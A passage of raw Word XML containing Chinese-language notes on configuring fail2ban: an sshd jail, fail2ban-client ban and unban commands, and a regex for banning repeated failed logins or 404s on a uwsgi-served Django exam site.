      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>您还可以创建自己的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置。默认情况下，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CentOS 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上没有启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，您需要在添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>enabled = true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下示例显示了如何为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Jail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CCC5FE" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[sshd]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D49E67" w14:textId="7B4BCFE6" w:rsidR="008B67DF" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>enabled   = true</w:t>
      </w:r>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ubunt</w:t>
      </w:r>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以不写）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CDBC4C" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>port    = ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD7226" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>logpath = %(sshd_log)s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D0DAAC" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>backend = %(sshd_backend)s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861BB2C" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/etc/fail2ban/jail.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0770873A" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D926D4" w14:textId="11911F75" w:rsidR="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每次修改配置文件时，都必须重新启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fail2ban</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务，以使更改生效：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B34B8A" w14:textId="1FB36092" w:rsidR="001B4D6C" w:rsidRPr="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo systemctl restart fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965E4F1" w14:textId="77777777" w:rsidR="001B4D6C" w:rsidRDefault="001B4D6C" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350CDC66" w14:textId="77777777" w:rsidR="001B4D6C" w:rsidRDefault="001B4D6C" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49700FA5" w14:textId="6D428B78" w:rsidR="001B4D6C" w:rsidRDefault="008B67DF" w:rsidP="008B67DF">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="008B67DF">
        <w:t>fail2ban-client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB46D2" w14:textId="0CC5AB2E" w:rsidR="00103EC6" w:rsidRDefault="00103EC6" w:rsidP="00103EC6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00103EC6">
        <w:t>https://www.xiaosige.com/post/a8e858c0.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E7433" w14:textId="77777777" w:rsidR="00103EC6" w:rsidRPr="00103EC6" w:rsidRDefault="00103EC6" w:rsidP="00103EC6"/>
    <w:p w14:paraId="6B14F791" w14:textId="09B78982" w:rsidR="001B4D6C" w:rsidRDefault="005C352D" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fail2ban</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3439E437" w14:textId="4A4551EC" w:rsidR="001B4D6C" w:rsidRPr="00490C3F" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490C3F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>fail2ban-client status sshd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E9CD8" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18222D14" w14:textId="632CA9E4" w:rsidR="005C352D" w:rsidRDefault="005C352D" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unban ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915FBDC" w14:textId="2E028494" w:rsidR="008B67DF" w:rsidRPr="00490C3F" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490C3F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>fail2ban-client set sshd unbanip 23.34.45.56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611CA9F4" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF4F21D" w14:textId="184370B9" w:rsidR="001B4D6C" w:rsidRDefault="005C352D" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>banIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A994D" w14:textId="7B38CD48" w:rsidR="008B67DF" w:rsidRPr="00490C3F" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00490C3F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>fail2ban-client set sshd banip 23.34.45.56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02985044" w14:textId="77777777" w:rsidR="008B67DF" w:rsidRDefault="008B67DF" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707DF706" w14:textId="6C278C9B" w:rsidR="005C352D" w:rsidRDefault="005C352D" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我自己爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sshd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试了下，这里一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次重试密码机会，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次，这里其实测试的时候输错了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>次密码，才会被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fail2ban</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认为是要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ban</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20318BD1" w14:textId="42FF70B0" w:rsidR="005C352D" w:rsidRDefault="005C352D" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C92F9E2" wp14:editId="491CD905">
            <wp:extent cx="6635565" cy="3094892"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="146625219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52199" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6747966" cy="3147317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A31FA08" w14:textId="77777777" w:rsidR="00825E58" w:rsidRDefault="00825E58" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A44E01" w14:textId="77777777" w:rsidR="00825E58" w:rsidRDefault="00825E58" w:rsidP="001B4D6C">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290C8DC0" w14:textId="77777777" w:rsidR="00103EC6" w:rsidRDefault="00103EC6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6004C2AE" w14:textId="0A492CC8" w:rsidR="00722039" w:rsidRDefault="00722039" w:rsidP="00722039">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实战：考试系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>封禁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者爆破问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F9B33" w14:textId="77777777" w:rsidR="00BD1EED" w:rsidRDefault="00BD1EED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353E0DAC" w14:textId="36985C8F" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我是用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uwsgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，日志文件与格式如下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/var/log/uwsgi/uwsgi.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691FC084" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRPr="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[pid: 799467|app: 0|req: 36/44] 129.151.212.54 () {40 vars in 544 bytes} [Tue Apr  9 07:44:07 2024] POST /api/login/ =&gt; generated 41 bytes in 244 msecs (HTTP/1.1 304) 7 headers in 267 bytes (1 switches on core 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0D64D" w14:textId="38347212" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="00EC5152">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[pid: 799467|app: 0|req: 37/45] 129.151.212.54 () {40 vars in 543 bytes} [Tue Apr  9 07:44:10 2024] POST /api/login/ =&gt; generated 41 bytes in 263 msecs (HTTP/1.1 304) 7 headers in 267 bytes (1 switches on core 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029A6931" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E27556E" w14:textId="06CB1A4F" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到登录接口响应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>304</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44262766" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2669802C" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，网络做法通常为使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正则表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试看是否能匹配到日志中测试数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C4F4FA" w14:textId="6479A044" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是此处有坑点，日志中有非标准格式行，会直接报错</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5152">
        <w:t>IndexError: string index out of range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这个问题仅仅是</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5152">
        <w:t>fail2ban-regex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身这种小测试工具的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E08D67" w14:textId="3866D0A2" w:rsidR="00EC5152" w:rsidRPr="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC5152">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>fail2ban-regex /var/log/uwsgi/uwsgi.log  "&lt;HOST&gt; \(.*\) .* \(HTTP/[012.]+ [345][0-9][0-9]\)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A95A268" w14:textId="50BD245E" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03290138" wp14:editId="1951F2D1">
            <wp:extent cx="5274310" cy="1591310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2125246651" name="图片 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46651" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1591310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15594FCC" w14:textId="09E08E8E" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时为了测试，需要把测试数据完整行单独放如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5152">
        <w:t>/var/log/uwsgi/uwsgi.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件中测试正则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0E78A8" w14:textId="50262EB0" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63D9EC54" wp14:editId="6651700F">
            <wp:extent cx="5274310" cy="1618615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="186497714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77145" name="图片 1" descr="文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1618615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC6D7B" w14:textId="47E80CC0" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明测试通过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2550B58B" w14:textId="77777777" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E819603" w14:textId="17220B85" w:rsidR="00EC5152" w:rsidRDefault="00EC5152" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
